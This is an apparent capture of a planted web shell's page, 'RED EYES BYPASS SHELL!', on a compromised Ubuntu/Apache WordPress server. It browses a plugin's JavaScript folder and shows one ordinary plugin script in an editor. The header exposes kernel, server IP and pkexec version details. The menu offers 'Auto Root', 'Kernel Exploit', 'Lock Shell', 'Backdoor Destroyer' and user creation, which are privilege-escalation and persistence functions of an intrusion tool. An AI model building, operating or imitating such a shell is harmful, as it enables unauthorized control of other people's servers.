Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
pr /
wp-content /
plugins /
monarch /
core /
admin /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
checkbox.js
2.62
KB
-rwxr-xr-x
colorpicker.js
16.58
KB
-rwxr-xr-x
common.js
1.31
KB
-rwxr-xr-x
compatibility-warning.js
1.83
KB
-rwxr-xr-x
core.js
5.56
KB
-rwxr-xr-x
es6-promise.auto.min.js
6.66
KB
-rwxr-xr-x
eye.js
935
B
-rwxr-xr-x
frame-helpers.js
1.04
KB
-rwxr-xr-x
functions-init.js
8.72
KB
-rwxr-xr-x
page-resource-fallback.js
854
B
-rwxr-xr-x
page-resource-fallback.min.js
293
B
-rwxr-xr-x
popper.min.js
16.91
KB
-rwxr-xr-x
portability.js
23.41
KB
-rwxr-xr-x
react-dom.production.min.js
123.06
KB
-rwxr-xr-x
react.production.min.js
13.86
KB
-rwxr-xr-x
recaptcha.js
1.66
KB
-rwxr-xr-x
support-center.js
19.29
KB
-rwxr-xr-x
tippy.min.js
22.71
KB
-rwxr-xr-x
version-rollback.js
2.41
KB
-rwxr-xr-x
wp-color-picker-alpha.min.js
8.32
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compatibility-warning.js
/** * Compatibility Warning Scripts. * * The scripts below is used for overriding or modifying default WP template to show * warning about WP and PHP versions compatibility with user's environment. * * @see {ET_Core_Compatibility_Warning()} */ (function($) { 'use strict'; // Bail early if there is no compatibility warning data. if (!window.et_compatibility_warning) { return; } var data = et_compatibility_warning; // A. Update Core. if (data.update_core_data) { if (data.update_core_data.plugins) { // Plugins - Override updates table body. var pluginsTableBody = window.wp.template('et-update-core-plugins-table-body'); $('#update-plugins-table .plugins').html(pluginsTableBody(data.update_core_data)); } if (data.update_core_data.themes) { // Themes - Override updates table body. var themesTableBody = window.wp.template('et-update-core-themes-table-body'); $('#update-themes-table .plugins').html(themesTableBody(data.update_core_data)); } } // B. Manage Themes. if (data.manage_themes_data) { // Themes List & Details - Remove default templates, so we can replace them later. $('#tmpl-theme').remove(); $('#tmpl-theme-single').remove(); } // C. Theme Customizer. if (data.customizer_data) { // Active Theme - Disable publish button. if (true !== data.customizer_data.compatible_wp || true !== data.customizer_data.compatible_php) { $('#customize-save-button-wrapper #save').remove(); $('#customize-save-button-wrapper #publish-settings') .removeAttr('id') .attr('class', 'button button-primary disabled') .text(data.customizer_data.disabled_text); } // Themes List & Details - Remove default templates, so we can replace them later. $('#tmpl-customize-control-theme-content').remove(); } })(jQuery);
Close